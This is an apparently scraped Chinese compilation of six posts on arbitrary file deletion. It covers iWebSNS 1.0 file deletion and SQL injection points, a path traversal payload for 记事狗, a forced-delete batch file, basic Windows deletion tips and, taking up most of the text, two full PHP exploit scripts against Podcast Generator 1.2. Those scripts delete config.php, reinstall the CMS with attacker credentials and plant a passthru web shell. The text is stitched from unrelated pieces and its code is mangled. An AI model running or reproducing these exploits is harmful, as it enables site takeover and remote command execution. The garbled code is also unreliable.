iwebsns1.0 任意文件删除&&2个注入漏洞预警

“每天期待死亡”通过精心收集，向本站投稿了6篇iwebsns1.0 任意文件删除&&2个注入漏洞预警，下面是小编整理后的iwebsns1.0 任意文件删除&&2个注入漏洞预警，希望能帮助到大家!

篇1：iwebsns1.0 任意文件删除&&2个注入漏洞预警

action\users\user_ico_cut_save.action.php

2//引入模块公共方法文件

3require(“foundation/module_users.php”);

4require(“foundation/aintegral.php”);

5require(“foundation/fcontent_format.php”);

6require(“api/base_support.php”);

7//语言包引

8$u_langpackage=new userslp;

9//数据库操作

10dbtarget('w',$dbServs);

11$dbo=new dbex;

12$photo_url=short_check(get_argg('pic')); //这里这里.

13$user_id=get_sess_userid();//用户ID

14$user_name=get_sess_username();//用户名

15$ico_url=long_check(get_argp('u_ico_url'));

16往下看

17;

18;

19;

21if(preg_match(“/uploadfiles\/photo_store/”,$photo_url)){

22unlink($photo_url);//删除临时图片文件 // you know

\iwebsns\action\poll\poll_submit.action.php

1//变量声明区

2$user_id=get_sess_userid();

3$user_name=get_sess_username();

4$userico=get_sess_userico();

5$cho=get_argp('pol_cho'); //此处可控未过滤

6$pid=intval(get_argg('pid'));

7$anon=short_check(get_argp('anonymity'));

8$total_credit=intval(get_argp('credit'));

9$per_int=intval(get_argp('percredit'));

10$p_subject=short_check(get_argp('subject')); 往下看

11foreach($cho as $v){

12$option.=“,”.$v;

13}

14$sql=“select `option` from $t_polloption where oid in(0.$option)”; //you know too

action\users\user_info.action

2require(“foundation/module_users.php”);

3//引入语言包

4$u_langpackage=new userslp;

5//变量获得

6$user_id =get_sess_userid();

7$model = short_check(get_argg('model'));

8$birth_year = short_check(get_argp('birth_year'));

9$birth_month = short_check(get_argp('birth_month'));

10$birth_day = short_check(get_argp('birth_day'));

11$reside_city = short_check(get_argp('reside_city'));

12$reside_province = short_check(get_argp('reside_province'));

13$birth_city = short_check(get_argp('birth_city'));

14$birth_province = short_check(get_argp('birth_province'));

15$is_finish=intval(get_argg('is_finish'));

16$info = get_argp('info'); //看这里

17往下看

18//更新自定义信息表

19if(!empty($info)){

20foreach($info as $key => $value){

21if($value!==''){

22$key=explode('|',$key);

23$sql=“insert into $t_user_info (user_id,info_id,info_value) values ($user_id,'”.$key[0].“','$value')”;//直接查询, 不过受Gpc

24$dbo ->exeUpdate($sql);

25}

26}

27}

篇2：强制删除任意文件以及文件夹

DEL /F /A /Q \\?\%1

RD /S /Q \\?\%1

保存为*.bat

将要删除的文件以及文件夹拖到该批处理上，

强制删除任意文件以及文件夹

，

篇3：记事狗任意文件删除漏洞预警

利用条件：

1.仅限于windows主机,linux无效（至少我本机就不行）

2.已注册用户

3.需要删除的文件可读写

在modules/ajax/event.mod.php中

www.xxxx.com

#保护性删除图片

function doUnlink($pic){

if(!$pic) return false;

0 = trim(strtolower(end(explode(“.”,$pic))));

$exp = '././images/event/[0-9]{10}'.MEMBER_ID.'_b.'.0;

if(ereg($exp,$pic)){

unlink($pic);

unlink(strtr($pic,'_b.','_s.'));

return true;

}else {

return false;

}

该函数在 onloadPic中被调用

if($_FILES['pic']['name']){

//省略.....................

$hid_pic = $this->Post['hid_pic'];

$eid = (int) $this->Post['id'];

$this->doUnlink($hid_pic,$eid);

//省略.............

}

只要$_FILES['pic']['name'] 不为空，然后我们就可以构造hid_pic了

hid_pic 的内容为：

././images/event/1234567890{MEMBER_ID}_b.{你要删除的文件的后缀}/../../../{你要删除的文件}

比如我们要删除./data/install.lock文件，而且我的MEMBER_ID为2 则：

././images/event/12345678902_b.lock/../../../data/install.lock

本地测试成功

实际利用：

在 index.php?mod=event&code=pevent

上传抓包，然后在hid_pic底下填写././images/event/12345678902_b.lock/../../../data/install.lock 即可

修复方案：

do it yourself

篇4：强制删除任意文件以及文件夹漏洞预警

DEL /F /A /Q \\?\%1

RD /S /Q \\?\%1

保存为*.bat

将要删除的文件以及文件夹拖到该批处理上，

强制删除任意文件以及文件夹漏洞预警

，

篇5：如何删除文件

清空回收站的方法非常简单,只是采用这种方法是将回收站的所有内容都删除,一概不留。如果有些文件还不想彻底删除,可以采取下面的方法。打开“回收站”窗口后,选择要彻底删除的文件,然后点击右键,在右键菜单中点击“删除”即可。或者选中要彻底删除的文件后直接按键盘上的Del或Delete键。

删除方法四

还有一种方法就是在文件还没有放入回收站前就直接删除,首先单击文件夹“bkill”,然后先按键盘上的Shift键再按Del或Delete键。在弹出的“确认文件夹删除”对话框中选择“是”。

温馨提示：这是最基础的文件删除方法。

篇6：Podcast Generator多个模块文件包含和任意文件删除漏洞

影响版本:

Podcast Generator 1.2

程序介绍:

Podcast Generator是用PHP编写的免费播客发布脚本，

漏洞分析:

Podcast Generator的core/archive_cat.php、core/admin/itunescategories.php和core /admin/login.php页面没有正确地过滤对GLOBALS[absoluteurl]参数所传送的输入，core/themes.php页面没有正确地过滤对GLOBALS[theme_path]参数所传送的输入，这可能用于包含本地或外部资源的任意文件；此外core/admin /delete.php页面没有正确地过滤对file和ext“参数所传送的输入，可能导致删除任意文件。成功利用这些漏洞要求打开了 register_globals。

漏洞利用:

# Podcast Generator <= 1.2 unauthorized CMS Re-Installation Remote Exploit

# by staker

# --------------------------------------

# mail: staker[at]hotmail[dot]it

# url: podcastgen.sourceforge.net

# --------------------------------------

# it works with register_globals=on

# short explanation:

# ----------------------------------------

# Podcast Generator contains one flaw that

# allows an attacker to re-install the cms

# because of unlink() in'delete.php'file

# ----------------------------------------

# Look at'/core/admin/delete.php'

# (removed author's comments)

if (isset($_REQUEST['absoluteurl']) OR isset($_REQUEST['amilogged']) OR isset($_REQUEST['theme_path']))

{ exit; } <-------- {1}

if ($amilogged != ”true“) { exit; } <-------{2}

if (isset($_GET['file']) AND $_GET['file']!=NULL) {

$file = $_GET['file'];

$ext = $_GET['ext'];

if (file_exists(”$absoluteurl$upload_dir$file.$ext“)) {

unlink (”$upload_dir$file.$ext“); <--------{3}

$PG_mainbody .=”

$file.$ext$L_deleted

“;

}

# Explanation (code snippet above [points])

# -----------------------------------------------------------------------------------

# 1. blocks all'amilogged'REQUEST variables,what about GLOBALS?,therefore useless!

# 2.if'amilogged'isn't true ->exit()functionactivated.

# 3. unlink()deletean existing file.

# -----------------------------------------------------------------------------------

# It's possible to delete 'config.php' to re-install the cms. we need 'amilogged'

# set to true. We candoit using a GLOBALS variable.

# admin/core/delete.php?GLOBALS[amilogged]=true&file=../../config&ext=php

# Various:

# --------------------------------------------------

# They didn't help me but i want to give a thanks to

# girex,skerno,Chaomel,XaDoS,Dante90andGianluka_95

# --------------------------------------------------

# Today is: 02 June 2009.

# Location: Italy,Turin.

# www. .com/watch?v=dBc7mK5iAH0

# --------------------------------------------------

error_reporting(E_STRICT ^ E_WARNING);

if($argc< 2) start_usage();

$host=$argv[1];

$path=$argv[2];

re_install();

functionsend_request($data)

{

global$host;

if(!$sock= @fsockopen($host,80)) {

die(”connection refused..\n“);

}

if(isset($data)) {

fputs($sock,$data);

}

while(!feof($sock)) {$result.=fgets($sock); }

fclose($sock);

return$result;

}

functionremove_config()

{

global$host,$path;

$in_lex=”/{$path}/core/admin/delete.php?GLOBALS[amilogged]=true&file=../../config&ext=php“;

$config=”GET {$in_lex} HTTP/1.1\r\n“;

$config.=”User-Agent: Lynx (textmode)\r\n“;

$config.=”Host: {$host}\r\n“;

$config.=”Connection: close\r\n\r\n“;

$lol= send_request($config);

if(check_config() != FALSE) {

die(”register_globals=off, exploit failed!\n“);

}

else{

returntrue;

}

functionre_install()

{

global$host,$path;

$binary=”username=staker&password=killingyourself&password2=killingyourself&setuplanguage=en“;

$config=”POST {$path}/setup/index.php?step=5 HTTP/1.1\r\n“;

$config.=”User-Agent: Lynx (textmode)\r\n“;

$config.=”Host: {$host}\r\n“;

$config.=”Content-Type: application/x-www-form-urlencoded\r\n“;

$config.=”Content-Length: “.strlen($binary).”\r\n“;

$config.=”Connection: close\r\n\r\n“;

$config.=$binary;

remove_config();

$content= send_request($config);

if(eregi('Creation of the configuration file',$content)) {

echo”[ re-installed successful\n“;

echo”[ username: staker\n[ password: killingyourself\n“;exit(0);

}

else{

die(”Exploit failed\n“);

}

functioncheck_config()

{

global$host,$path;

$config=”GET /{$path}/config.php HTTP/1.1\r\n“;

$config.=”User-Agent: Lynx (textmode)\r\n“;

$config.=”Host: {$host}\r\n“;

$config.=”Connection: close\r\n\r\n“;

$content= send_request($config);

if(ereg('HTTP/1.1 404 Not Found',$content)) {

returnfalse;

}

else{

returntrue;

}

functionstart_usage()

{

print”[*--------------------------------------------------------------------------*]\n“.

”[* Podcast Generator <= 1.2 unauthorized CMS Re-Installation Remote Exploit *]\n“.

”[*--------------------------------------------------------------------------*]\n“.

”[* Usage: php podcast_xpl.php [host] [path] *]\n“.

”[* [host] host -> example: localhost *]\n“.

”[* [path] path -> example: /podcast *]\n“.

”[*--------------------------------------------------------------------------*]\n“;

die();

}

#!/usr/bin/php -q -d short_open_tag=on

echo”

Podcast Generator <= 1.1 Remote Code Execution

Vendor: podcastgen.sourceforge.net

Exploit Author: BlackHawk

Author's Site: itablackhawk.altervista.org

Credits goes to RGodforthe code

Thanks to Marija justforexist :)

“;

if($argc<4) {

echo”

Usage: php“.$argv[0].”host /path/ command

Es: php“.$argv[0].”localhost / dir

“;

die;

}

Bugs explanation:

This app has tons of bugs, but because of his structure lot of them are useless.. but not them all!

Look at 'core/admin/delete.php' (i have omitted the author comments):

---------------------------

if (isset($_REQUEST['absoluteurl']) OR isset($_REQUEST['amilogged']) OR isset($_REQUEST['theme_path'])) { exit; }

if (isset($_GET['file']) AND $_GET['file']!=NULL) {

$file = $_GET['file'];

$ext = $_GET['ext'];

if (file_exists(”$absoluteurl$upload_dir$file.$ext“)) {

unlink (”$upload_dir$file.$ext“);

$PG_mainbody .=”

$file.$ext$L_deleted

“;

}

---------------------------

no check for admin rights, so now we can delete whatever file we want, with any exstension..

so let's delete config.php and make a rfesh new installation with a password set by us!

the RCE is triggered in 'core/admin/scriptconfig.php', line 56:

---------------------------

// recent in home

$recent = $_POST['recent'];

if ($recent != ”“) {

$max_recent = $recent;

}

---------------------------

no sanitize of the input and no quotes added when writting to the config file (so no need mq=off)

BlackHawk

error_reporting(0);

ini_set(”max_execution_time“,0);

ini_set(”default_socket_timeout“,5);

functionquick_dump($string)

{

$result='';$exa='';$cont=0;

for($i=0;$i<=strlen($string)-1;$i++)

{

if((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

{$result.=” .“;}

else

{$result.=” “.$string[$i];}

if(strlen(dechex(ord($string[$i])))==2)

{$exa.=” “.dechex(ord($string[$i]));}

else

{$exa.=” 0“.dechex(ord($string[$i]));}

$cont++;if($cont==15) {$cont=0;$result.=”\r\n“;$exa.=”\r\n“;}

}

return$exa.”\r\n“.$result;

}

$proxy_regex='(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

functionsendpacketii($packet)

{

global$proxy,$host,$port,$html,$proxy_regex;

if($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if(!$ock) {

echo'No response from '.$host.':'.$port;die;

}

else{

$c= preg_match($proxy_regex,$proxy);

if(!$c) {

echo'Not a valid proxy...';die;

}

$parts=explode(':',$proxy);

echo”Connecting to “.$parts[0].”:“.$parts[1].” proxy...\r\n“;

$ock=fsockopen($parts[0],$parts[1]);

if(!$ock) {

echo'No response from proxy...';die;

}

fputs($ock,$packet);

if($proxy=='') {

$html='';

while(!feof($ock)) {

$html.=fgets($ock);

}

else{

$html='';

while((!feof($ock))or(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

fclose($ock);

}

$host=$argv[1];

$path=$argv[2];

$cmd=”“;

for($i=3;$i<=$argc-1;$i++){

$cmd.=” “.$argv[$i];

}

$port=80;

$proxy=”“;

if(($path[0]'/')or($path[strlen($path)-1]'/')) {echo'Error... check the path!';die;}

if($proxy=='') {$p=$path;}else{$p=''.$host.':'.$port.$path;}

echo”Step1 - Delete config.inc\r\n“;

$packet=”GET “.$p.”core/admin/delete.php?file=../../config&ext=php HTTP/1.0\r\n“;

$packet.=”Host: “.$host.”\r\n“;

$packet.=”Connection: Close\r\n\r\n“;

sendpacketii($packet);

echo”Step2 - Creating new configuration\r\n“;

$data=”username=new_user_name&password=blackhawk&password2=blackhawk&setuplanguage=en“;

$packet=”POST “.$p.”/setup/index.php?step=5 HTTP/1.0\r\n“;

$packet.=”Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n“;

$packet.=”Accept-Language: it\r\n“;

$packet.=”Content-Type: application/x-www-form-urlencoded\r\n“;

$packet.=”Accept-Encoding: gzip, deflate\r\n“;

$packet.=”User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n“;

$packet.=”Host: “.$host.”\r\n“;

$packet.=”Content-Length: “.strlen($data).”\r\n“;

$packet.=”Connection: Close\r\n“;

$packet.=”Cache-Control: no-cache\r\n\r\n“;

$packet.=$data;

sendpacketii($packet);

echo”Step3 - Logging in\r\n“;

$data=”user=new_user_name&password=blackhawk“;

$packet=”POST “.$p.”?p=admin HTTP/1.0\r\n“;

$packet.=”Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n“;

$packet.=”Accept-Language: it\r\n“;

$packet.=”Content-Type: application/x-www-form-urlencoded\r\n“;

$packet.=”Accept-Encoding: gzip, deflate\r\n“;

$packet.=”User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n“;

$packet.=”Host: “.$host.”\r\n“;

$packet.=”Content-Length: “.strlen($data).”\r\n“;

$packet.=”Connection: Close\r\n“;

$packet.=”Cache-Control: no-cache\r\n\r\n“;

$packet.=$data;

sendpacketii($packet);

$temp=explode(”Set-Cookie: “,$html);

$temp2=explode(” “,$temp[1]);

$PHPid=$temp2[0];

echo”Step4 - Sending shell\r\n“;

$data=”streaming=yes&fbox=yes&cats=yes&newsinadmin=yes&strictfilename=yes&recent=5; if (isset(\$_GET[cmd])){if(get_magic_quotes_gpc()){\$_GET[cmd]=stripslashes(\$_GET[cmd]);}echo 666999;passthru(\$_GET[cmd]);echo 666999;}\$xyz=5&recentinfeed=All&selectdateformat=d-m-Y&scriptlanguage=en“;

$packet=”POST “.$p.”?do=config&p=admin&action=change HTTP/1.0\r\n“;

$packet.=”Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n“;

$packet.=”Accept-Language: it\r\n“;

$packet.=”Content-Type: application/x-www-form-urlencoded\r\n“;

$packet.=”Accept-Encoding: gzip, deflate\r\n“;

$packet.=”User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n“;

$packet.=”Host: “.$host.”\r\n“;

$packet.=”Cookie: $PHPid\r\n“;

$packet.=”Content-Length: “.strlen($data).”\r\n“;

$packet.=”Connection: Close\r\n“;

$packet.=”Cache-Control: no-cache\r\n\r\n“;

$packet.=$data;